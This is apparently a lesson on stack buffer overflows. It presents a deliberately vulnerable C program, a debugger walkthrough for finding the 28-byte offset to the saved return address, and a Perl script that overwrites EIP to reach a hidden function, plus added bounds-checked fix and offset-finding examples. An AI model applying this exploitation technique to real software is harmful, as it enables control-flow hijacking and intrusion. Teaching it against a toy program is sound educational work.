Introduction to Buffer Overflow

Session 10
==========
A buffer overflow is a vulnerability that arises when an application is poorly coded: input is copied into a fixed-size buffer with no length check, and no exception handling catches the resulting memory corruption. Because the excess data spills over the saved return address on the stack, an attacker can change the value that is loaded into EIP and overwrite it with the address of malicious code.

Requirements
------------
1. Windows OS
2. Vulnerable Application (the C program below, compiled with DEVCPP 4.9.9)
3. OllyDBG
4. Perl

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copies the argument into a 10-byte stack buffer with no length check.
 * Any argument longer than the buffer overwrites the adjacent stack data,
 * including the saved return address of this function. */
int overflow(char *s)
{
char buffer[10];     /* this is our buffer */
strcpy(buffer, s);   /* this is the vulnerable code: no bounds check */
return 0;
}

/* Never called on a normal run; it is only reached if the return address
 * saved by overflow() is redirected here. */
void exploit(void)
{
printf("Buffer Overflow Chal Gya Hai....\n");
}

int main(int argc, char *argv[])
{
int a = 0;

printf("You are in the main code....\n");
if (argc < 2)
{
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
overflow(argv[1]);
if (a == 1)   /* a is never set to 1, so this branch is dead on a normal run */
{
exploit();
}
else
{
printf("Buffer Overflow Fail Ho Gya Hai....\n");
}
return 0;
}
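For comparison, here is the bounds-checked counterpart of the lesson's overflow(). This is an added example and not code from the session notes: it keeps the same 10-byte buffer but refuses any input that does not fit, so the saved return address can never be reached. The function names copy_bounded and overflow_fixed are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not part of the original session notes. It shows the
 * bounds-checked form of the lesson's overflow(): the 10-byte buffer is
 * kept, but the copy now refuses input that does not fit. */

#define BUF_SIZE 10   /* same size as char buffer[10] in the lesson */

/* Copies src into dst only if src plus its terminating NUL fits in
 * dst_size bytes. Returns 0 on success and -1 if the input is rejected;
 * in both cases dst is left NUL-terminated and no byte beyond
 * dst[dst_size - 1] is ever written. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n;

    if (dst_size == 0)
        return -1;
    n = strlen(src);
    if (n >= dst_size) {          /* n == dst_size leaves no room for the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);      /* n + 1 includes the terminator */
    return 0;
}

/* Hardened counterpart of overflow(): same local buffer, checked copy.
 * Returns 0 if the input was accepted, -1 if it was too long. */
int overflow_fixed(const char *s)
{
    char buffer[BUF_SIZE];
    int rc = copy_bounded(buffer, sizeof buffer, s);

    if (rc != 0)
        fprintf(stderr, "input of %zu bytes rejected (limit %zu)\n",
                strlen(s), sizeof buffer - 1);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    return overflow_fixed(argv[1]) == 0 ? 0 : 2;
}
```

Note the off-by-one that copy_bounded guards against: a 10-character argument has no room for its terminator in a 10-byte buffer and is rejected, while 9 characters fit. Replacing strcpy with strncpy(buffer, s, sizeof buffer) alone would not be enough, because strncpy leaves the buffer without a NUL terminator when the input is truncated.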

How argc and argv map onto a command line, using an nmap command as the illustration:

nmap -sS -sC -sV 192.168.0.1 -Pn

int argc, char *argv[]
argc –> number of arguments passed (here 6, counting the program name)
argv –> the arguments themselves
argv[0] –> nmap (the program name)
argv[1] –> -sS
argv[2] –> -sC
argv[3] –> -sV
argv[4] –> 192.168.0.1
argv[5] –> -Pn

In OllyDBG, the instruction we want execution to land on is:

00401316 |. E8 94FFFFFF CALL Ganesh.004012AF

00401316 —> normal form (as printed by the debugger)

x86 stores multi-byte values in memory lowest byte first, so the CPU reads the saved return address into EIP in little-endian form. The address therefore has to be placed in the input byte-reversed:

00401316
00 40 13 16
16 13 40 00 —> little-endian form

Next, generate a long hash string to use as the crash input (the one used in this session is shown below) and run the program with it:

1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

ganesh.exe 1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

The program crashes and the crash report shows:

Exception Offset: 35376239

This is the value that was loaded into EIP, taken from our input. Convert it back from little-endian to recover the ASCII characters that overwrote the return address:

35376239
35 37 62 39
39 62 37 35 —> ASCII "9b75"

Locate "9b75" in the input string:

1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

1e66186a8e7f4a61ebaae3f46ae29b75
1e66186a8e7f4a61ebaae3f46ae2 9b75

Exactly 28 characters precede "9b75", so 28 bytes of input are consumed before the saved return address is reached.

Confirm the offset with a pattern whose bytes are easy to recognise. ASCII values:

A –> 41
B –> 42
C –> 43
D –> 44
E –> 45

Input: 28 times A + BCDE

AAAAAAAAAAAAAAAAAAAAAAAAAAAABCDE

"BCDE" is 42 43 44 45; read little-endian it is 45 44 43 42, and the crash now reports exactly that value, which confirms the offset of 28:

Exception Offset: 45444342
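The two manual steps above (decoding the Exception Offset as little-endian bytes, then locating those bytes in the crash input) are the routine crash-triage check for whether a faulting EIP was taken from attacker-controlled input. The following is an added example, not code from the session notes, that automates both steps for the lesson's own inputs: the 128-character hash string and the A*28+BCDE pattern. The function names le_byte and offset_of_eip_in_input are this example's own. It also handles the case the lesson's choice of a non-repeating hash avoids: if the 4-byte pattern occurs more than once, the offset is ambiguous.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not part of the original session notes. It automates
 * the two manual steps from the lesson: decoding the crash report's
 * Exception Offset as little-endian bytes, and locating those bytes in
 * the crash input to measure the distance to the saved return address.
 * The inputs below are the ones used in the lesson. */

/* The 128-character hash string used as the first crash input. */
static const char CRASH_INPUT[] =
    "1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44d"
    "d919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba";

/* The confirmation pattern: 28 times 'A' followed by "BCDE". */
static const char CONFIRM_INPUT[] =
    "AAAAAAA" "AAAAAAA" "AAAAAAA" "AAAAAAA" "BCDE";

/* Byte `index` (0 = lowest) of a 32-bit value, i.e. the order in which
 * x86 stores it in memory: 0x00401316 -> 16 13 40 00. */
unsigned le_byte(uint32_t value, int index)
{
    return (unsigned)((value >> (8 * index)) & 0xff);
}

/* Decodes the reported EIP value into the 4 input bytes it was built from
 * and searches the input for them. Returns the offset of the single match;
 * -1 if the bytes do not occur (EIP was not taken from this input, or the
 * bytes contain a NUL that a C string cannot carry); -2 if the pattern
 * occurs more than once, which is why a non-repeating input is needed. */
long offset_of_eip_in_input(const char *input, uint32_t exception_offset)
{
    unsigned char needle[4];
    size_t len = strlen(input);
    long found = -1;
    int matches = 0;

    for (int i = 0; i < 4; i++)
        needle[i] = (unsigned char)le_byte(exception_offset, i);

    for (size_t pos = 0; len >= 4 && pos + 4 <= len; pos++) {
        if (memcmp(input + pos, needle, 4) == 0) {
            if (matches++ == 0)
                found = (long)pos;
        }
    }
    return matches > 1 ? -2 : found;
}

int main(void)
{
    printf("bytes of 0x00401316 in memory: %02x %02x %02x %02x\n",
           le_byte(0x00401316u, 0), le_byte(0x00401316u, 1),
           le_byte(0x00401316u, 2), le_byte(0x00401316u, 3));
    printf("offset from hash input:   %ld\n",
           offset_of_eip_in_input(CRASH_INPUT, 0x35376239u));
    printf("offset from A*28+BCDE:    %ld\n",
           offset_of_eip_in_input(CONFIRM_INPUT, 0x45444342u));
    printf("all-A input is ambiguous: %ld\n",
           offset_of_eip_in_input("AAAAAAAAAAAAAAAA", 0x41414141u));
    return 0;
}
```

Both lesson inputs yield 28, matching the hand calculation. An input made only of the same repeated character would report -2, because the same 4 bytes appear at every position and the offset cannot be determined from it.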

Perl script for creating the exploit input:

use strict;
use warnings;

my $junk = "\x41" x 28;              # 28 times A, fills the 28 bytes before the return address
my $EIP = "\x16\x13\x40\x00";        # address of the malicious code (00401316) in little-endian form
my $exploit = $junk . $EIP;
print "Buffer Overflow Fatne wala hai....\n";
system("ganesh.exe", $exploit);
print "Diwali Mubarak Ho...\n";

https://ufile.io/9os13
